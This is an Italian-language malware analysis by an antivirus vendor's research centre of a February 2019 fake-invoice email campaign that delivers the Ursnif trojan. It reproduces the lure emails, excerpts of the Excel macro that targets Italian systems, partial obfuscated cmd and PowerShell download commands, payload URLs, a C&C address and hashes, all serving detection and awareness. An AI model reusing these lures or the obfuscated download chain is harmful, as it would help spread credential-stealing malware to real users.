Analisi da parte del C.R.A.M. (Centro di Ricerca Anti-Malware) di TG Soft di una mail della campagna che diffonde il malware Trojan  inviata in data 12 Febbraio 2019. Per gli invii massivi di mail fraudolente, vengono utilizzati i metodi di "ingegneria sociale" che sono sviluppati da persone/cyber-criminali per indurre la vittima ad aprire gli allegati infetti oppure a cliccare sui link presenti nel corpo del messaggio.

INDICE ==> Falsa mail con finta fattura scarica il malware Ursnif   ==> Come cercare di riconoscere una falsa mail ==> Come inviare mail sospette ==> Integra la protezione con Vir.IT Lite ==> Per i liceziatari in assistenza della versione PRO di Vir.IT eXplorer..

Falsa mail con finta Fattura diffonde Trojan Ursnif

Descrizione:
La campagna di invio di malspam è stata rilevata nella mattina del 12 Febbraio 2019.
Le mail si presentano con un breve messaggio variabile che sollecita l'apertura del file allegato.
L'allegato è un file di Excel contenente una MACRO malevola.

Riportiamo alcuni esempi di email analizzate diverse nel testo ma che contengono lo stesso allegato:

Oggetto:  AVVISO DI PAGAMENTO

AVVISO DI PAGAMENTO - Mozilla Thunderbird Da:                          Oggetto: AVVISO DI PAGAMENTO A:                            Gent.le Soggetto Responsabile, potrei avere notizie sul pagamento della fattura in oggetto? Cordialmente,   -- -- -- -- |----------------| [REDACTED] SpA   1 allegato: Ft._immediata_group_3124_2019_02.xls

Oggetto:  Fattura corretta

Fattura corretta - Mozilla Thunderbird Da:                          Oggetto: Fattura corretta A:                            Buongiorno, In allegato inviamo documento in oggetto Distinti saluti,   -- -- -- -- |----------------| UFFICIO   1 allegato: Ft._immediata_group_4715_2019_02.xls

• Fatt. 1757 del 12-02-2019
• fattura in scadenza
• Fattura N. 0036_F del 12_02_2019
• NS.ORDINE NR.0029809 DEL 12_02_19

L'allegato .xls (Excel) ha le seguenti caratteristiche: Nome File: Ft._immediata_group_4715_2019_02.xls Dimensione: 88576 Byte Md5: D8ED8287B99E918DA0E30EDEC975AD76 Famiglia malware: Downloader VirIT: X97M.Downloader.GD Il nome del file è variabile ma si tratta dello stesso file. Il nome ha questa struttura: Ft._immediata_group_[NUMERO RANDOM]_2019_02.xls

L'allegato Excel al suo interno contiene una MACRO che se eseguita porta al download con successiva esecuzione del payload del Malware.

La MACRO effettua all'apertura un controllo sull'attuale paese/regione impostato nel Pannello di controllo di Windows attraverso la proprietà "Application.International" sul parametro "xlCountrySetting" con la funzione chiamata Melon(). La funzione Melon() restituirà 39 se il paese è l'Italia.
Successivamente viene fatta la verifica con questa semplice condizione:

If Melon = xlBarOfPie - 32 Then Facebook...

Dove Melon in caso di paese Italia vale 39, xlBarOfPie è una funzione di Excel il cui valore di default è 71 e sottraendo il valore 32.
Semplificando la condizione è 39 = (71-32) pari a 39 = 39

Viene quindi dato il via all'infezione in quanto il controllo da esito positivo popolando la variabile con nome Facebook che conterrà il codice che sarà successivamente eseguito. Se il controllo non da esito positivo il file viene chiuso (Application.Quit).

.... Function Melon() devmas = xlCountrySetting Melon = Application.International(devmas) End Function Sub Workbook_Open() CellChecking End Sub Sub CellChecking() If Melon = xlBarOfPie - 32 Then Facebook = Shell#(Reports & LeftAnd + dWindow, xlPageBreakFull * 0) Else propert End Sub .... Sub propert() Application.Quit End Sub .....

Questo fa notare l'intenzione da parte dell'attaccante di colpire i soli target italiani.

Se la verifica della localizzazione ha esito positivo viene dato il via alla catena di comandi atti al download del Payload del Malware (vedi estratto grafico img.1):

• La MACRO esegue un primo comando "CMD" contenente il codice offuscato per effettuare il download di cui ne riportiamo una parte.

cmD /C "sEt   eIw=${d`EMo}='4 , 521,321,94 ,521,43 ,54,201, 93, 93 ,511,93 ,93 ,93,16,521 ,99,411 ,321 ,63(]][RAhC[, '''' ("nIo`j"::]GnIRTs[()'''' nIOJ-''x''+]3,1[)("gni`R`tSoT".}ECNerE`F`ErPEsoB`rEV{$ ( . 8 [........] , 8 ) ) ) 14 ,521 , 97 ,' -split "8";${de} = ${d`EmO}[-1..-(${d`emO}."CoU`NT")] -join "8";${dD}=${De}[-1..-(${D`e}."L`En`GtH")] -join "";^&("{1}{0}"-f 'x','ie')(${d`D}) &&SeT   tRsY=pOwERSHELl -ExecUTIONPOLiC BYpaSs  -nOni  -NOPRoFiLe -WiN  hIdden     .  (  \"{1}{0}\"-f 't','se') dCz2Y  ([tyPE](\"{2}{1}{0}\"-F 'Nt','ViROnmE','eN' )  )  ;   (   $DCZ2Y::( \"{0}{2}{1}{3}{4}{5}\" -f 'gETen','oNm','vIr','E','NTVari','aBLE' ).Invoke('eIW',( \"{1}{0}\"-f'rOCess','p'  )  ) )^^^|   ^^^&( ( .( \"{2}{1}{0}{3}\" -f'vari','Et-','G','ABLe') (  \"{1}{0}\" -f'r*','*Md') ).\"n`AmE\"[3,11,2]-JoIn''  )&& cmD/C %trSY%"

• Viene quindi eseguito un secondo comando "CMD" che esegue il codice deoffuscato in precedenza.

C:\Windows\system32\cmd.exe cmD /C %trSY%

• Il comando precedente esegue il comando finale in "POWERSHELL" di cui ne riportiamo una parte.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERSHELl  -ExecUTIONPOLiC BYpaSs  -nOni  -NOPRoFiLe -WiN  hIdden     .  (  \"{1}{0}\"-f 't','se') dCz2Y  [.....] `AmE\"[3,11,2]-JoIn''  )

• Il comando POWERSHELL da quindi inizio al download del malware.

Il comando POWERSHELL scarica due file:

• https://i[.]imgur[.]com/RC0YsYD.png
  
• https://delegirato[.]pro/aria-debug-5672.log
  

Il primo file "RC0YsYD.png" (MD5: FEBEF165B21350B21163C022E05033C7) è una immagine (img.2) mentre il secondo file è il Payload del Malware che viene quindi eseguito.

img.1

img.2

Il Payload del Malware viene salvato nella cartella temporanea dell'utente (%temp%) nel caso di questa analisi con nome "WindowsSdk 1.exe"

• Nome File: WindowsSdk 1.exe
• Dimensione: 486912 Byte
  
• Md5: 4BC2364FDF08D525BCEE825A8F87B0D2
• Data di compilazione: 12/02/2019 - 05:22:47
• Famiglia malware: Ursnif
• VirIT: Trojan.Win32.Ursnif.BHE

e successivamente eseguito.

Il malware Ursnif quindi esegue il processo di Internet Explorer (iexplore.exe) che utilizzerà per contattare il server di Comando e Controllo (C&C) a questo indirizzo IP 185[.]189[.]149[.]183 con la seguente struttura:

185[.]189[.]149[.]183/images/7vhKJ9weayBPZj6Mo2dxBtF/ 3NNtwfuOCM/_2FcBbIkEn1S35zVK/IIQLm_2BBR3f/pg1ZMlEMjKI/ DUGBKeoVBwYdeC/ UJGsmV8gaLxZynd4tyu0K/9Bf8j2KcVcAQT1Ev/ mkK3CD_2Br_2FI_/2FNBXiKUQWPQfk/ _2Fw5jA7/5[.]avi

Di seguito riportiamo il grafico completo del processo di infezione:


Lo scopo finale del Malware è quello di esfiltrare login e password di accesso a siti importanti come home banking, posta elettronica, Social Network, Siti Web, FTP etc...

IOC

MD5:
D8ED8287B99E918DA0E30EDEC975AD76 [DROPPER]
4BC2364FDF08D525BCEE825A8F87B0D2 [URSNIF]
B2469B2B08F67CC20D6A0483815D2AD4 [URSNIF]
E50F6B719019CF3DE572C33BE6E2AF1C [URSNIF]

URL:
https://delegirato[.]pro -> IP: 109[.]230[.]199[.]203 - ASN: AS42708 Portlane AB
C&C: 185[.]189[.]149[.]183 - ASN: AS51395 SOFTplus Entwicklungen GmbH

Torna ad inizio pagina

---

Come cercare di riconoscere una falsa mail

Integra la protezione del tuo PC/SERVER con Vir.IT eXplorer Lite

Se non doveste ancora utilizzare Vir.IT eXplorer PRO è consigliabile installare, ad integrazione dell'antivirus in uso per aumentare la sicurezza dei vostri computer, PC e SERVER indifferentemente, Vir.IT eXplorer Lite -FREE Edition-. Vir.IT eXplorer Lite ha le seguenti caratteristiche peculiari:

• liberamente utilizzabile sia in ambito privato sia in ambito aziendale con aggiornamenti Motore+Firme senza limitazioni temporali;
• interoperabile con eventuali altri AntiVirus, AntiSpyware, AntiMalware o Internet Security già presenti su PC e SERVER, consigliato l'utilizzo ad integrazione dell'AntiVirus già in uso poichè non conflitta nè rallenta il sistema ma permette di aumentare sensibilmente la sicurezza in termini di identificazione e bonifica dei file infetti;
• identifica e, in moltissimi casi, anche rimuove la maggior parte dei virus/malware realmente circolanti o, in alternativa, ne permette l'invio al C.R.A.M. Centro Ricerche Anti-Malware di TG Soft per l'analisi e l'aggiornamento di Vir.IT eXplorer per l'univoca identificazione e la corretta rimozione;
• grazie alla tecnologia Intrusione Detection, resa disponibile anche nella versione Lite di Vir.IT eXplorer, il software è in grado di segnalare eventuali virus/malware di nuova generazione che si siano posti in esecuzione automatica e procedere all'invio dei file segnalati al C.R.A.M. di TG Soft.
• Procedi al  download di Vir.IT eXplorer Lite dalla pagina ufficiale di distribuzione del sito di TG Soft.

Per i licenziatari in assistenza della versione PRO di Vir.IT eXplorer...

Per i possessori di Vir.IT eXplorer PRO è anche possibile contattare gratuitamente il supporto tecnico telefonico di TG Soft le cui modalità sono consultabili alla pagina del supporto CLIENTI.

C.R.A.M.
Centro Ricerche Anti-Malware di TG Soft

Torna ad inizio pagina